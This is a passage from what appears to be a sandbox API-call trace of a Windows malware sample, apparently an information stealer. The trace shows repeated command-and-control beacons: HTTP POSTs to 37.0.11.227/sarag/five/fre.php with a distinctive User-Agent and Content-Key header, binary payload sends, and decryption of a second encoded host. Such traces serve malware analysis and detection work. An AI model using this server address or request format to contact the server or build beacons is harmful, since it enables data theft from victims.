(lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0225.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.943] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0225.943] GetProcessHeap () returned 0x690000 [0225.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0225.943] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0225.943] GetProcessHeap () returned 0x690000 [0225.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0225.943] socket (af=2, type=1, protocol=6) returned 0x5ac [0225.944] connect (s=0x5ac, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0225.976] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0225.977] GetProcessHeap () returned 0x690000 [0225.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0225.977] GetProcessHeap () returned 0x690000 [0225.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0225.978] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0225.979] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0225.980] GetProcessHeap () returned 0x690000 [0225.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0225.980] GetProcessHeap () returned 0x690000 [0225.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0225.982] GetProcessHeap () returned 0x690000 [0225.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0225.982] GetProcessHeap () returned 0x690000 [0225.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0225.997] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0225.999] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0225.999] GetProcessHeap () returned 0x690000 [0225.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0225.999] GetProcessHeap () returned 0x690000 [0225.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0226.000] send (s=0x5ac, buf=0x6ad508*, len=242, flags=0) returned 242 [0226.001] send (s=0x5ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0226.001] GetProcessHeap () returned 0x690000 [0226.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0226.001] recv (in: s=0x5ac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0226.077] GetProcessHeap () returned 0x690000 [0226.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0226.077] GetProcessHeap () returned 0x690000 [0226.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0226.078] GetProcessHeap () returned 0x690000 [0226.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0226.078] GetProcessHeap () returned 0x690000 [0226.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0226.079] closesocket (s=0x5ac) returned 0 [0226.080] GetProcessHeap () returned 0x690000 [0226.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0226.080] GetProcessHeap () returned 0x690000 [0226.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0226.082] GetProcessHeap () returned 0x690000 [0226.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0226.082] GetProcessHeap () returned 0x690000 [0226.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0226.083] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd10) returned 0x5ac [0226.086] Sleep (dwMilliseconds=0xea60) [0226.087] GetProcessHeap () returned 0x690000 [0226.087] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0226.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.089] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.164] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0226.213] GetProcessHeap () returned 0x690000 [0226.213] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0226.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.215] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0226.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.217] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.218] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.218] GetProcessHeap () returned 0x690000 [0226.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0226.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.259] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0226.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.261] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0226.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.262] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0226.262] GetProcessHeap () returned 0x690000 [0226.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0226.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.265] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.266] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.268] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.269] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.269] GetProcessHeap () returned 0x690000 [0226.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0226.269] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0226.269] GetProcessHeap () returned 0x690000 [0226.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0226.270] GetProcessHeap () returned 0x690000 [0226.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0226.270] GetProcessHeap () returned 0x690000 [0226.271] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0226.271] GetProcessHeap () returned 0x690000 [0226.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0226.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.283] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0226.293] GetProcessHeap () returned 0x690000 [0226.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0226.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.295] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0226.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.297] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.299] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.299] GetProcessHeap () returned 0x690000 [0226.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0226.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.301] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0226.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.302] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0226.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.303] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0226.303] GetProcessHeap () returned 0x690000 [0226.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0226.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.304] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0226.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.305] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0226.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.307] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0226.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.310] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0226.310] GetProcessHeap () returned 0x690000 [0226.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0226.310] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0226.310] GetProcessHeap () returned 0x690000 [0226.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0226.311] socket (af=2, type=1, protocol=6) returned 0x5b0 [0226.311] connect (s=0x5b0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0226.335] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0226.335] GetProcessHeap () returned 0x690000 [0226.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0226.335] GetProcessHeap () returned 0x690000 [0226.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0226.336] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0226.337] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0226.337] GetProcessHeap () returned 0x690000 [0226.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0226.337] GetProcessHeap () returned 0x690000 [0226.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0226.338] GetProcessHeap () returned 0x690000 [0226.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0226.338] GetProcessHeap () returned 0x690000 [0226.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0226.339] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0226.340] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0226.340] GetProcessHeap () returned 0x690000 [0226.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0226.340] GetProcessHeap () returned 0x690000 [0226.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0226.341] send (s=0x5b0, buf=0x6ad508*, len=242, flags=0) returned 242 [0226.341] send (s=0x5b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0226.341] GetProcessHeap () returned 0x690000 [0226.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0226.341] recv (in: s=0x5b0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0226.423] GetProcessHeap () returned 0x690000 [0226.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0226.424] GetProcessHeap () returned 0x690000 [0226.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0226.424] GetProcessHeap () returned 0x690000 [0226.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0226.424] GetProcessHeap () returned 0x690000 [0226.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0226.425] closesocket (s=0x5b0) returned 0 [0226.425] GetProcessHeap () returned 0x690000 [0226.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0226.425] GetProcessHeap () returned 0x690000 [0226.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0226.426] GetProcessHeap () returned 0x690000 [0226.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0226.426] GetProcessHeap () returned 0x690000 [0226.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0226.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xcb0) returned 0x5b0 [0226.429] Sleep (dwMilliseconds=0xea60) [0226.430] GetProcessHeap () returned 0x690000 [0226.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0226.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.440] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0226.448] GetProcessHeap () returned 0x690000 [0226.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0226.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.449] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0226.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.450] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.455] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.455] GetProcessHeap () returned 0x690000 [0226.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0226.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.456] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0226.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.457] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0226.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.458] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0226.459] GetProcessHeap () returned 0x690000 [0226.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0226.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.460] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.469] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.470] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.471] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.471] GetProcessHeap () returned 0x690000 [0226.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0226.472] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0226.472] GetProcessHeap () returned 0x690000 [0226.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0226.473] GetProcessHeap () returned 0x690000 [0226.476] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0226.476] GetProcessHeap () returned 0x690000 [0226.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0226.479] GetProcessHeap () returned 0x690000 [0226.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0226.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.480] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0226.492] GetProcessHeap () returned 0x690000 [0226.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0226.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.493] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0226.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.494] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.496] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.496] GetProcessHeap () returned 0x690000 [0226.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0226.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.498] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0226.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.499] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0226.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.500] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0226.500] GetProcessHeap () returned 0x690000 [0226.500] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0226.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.501] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0226.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.502] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0226.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.503] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0226.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.503] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0226.503] GetProcessHeap () returned 0x690000 [0226.503] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0226.504] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0226.504] GetProcessHeap () returned 0x690000 [0226.504] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0226.504] socket (af=2, type=1, protocol=6) returned 0x5b4 [0226.504] connect (s=0x5b4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0226.534] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, 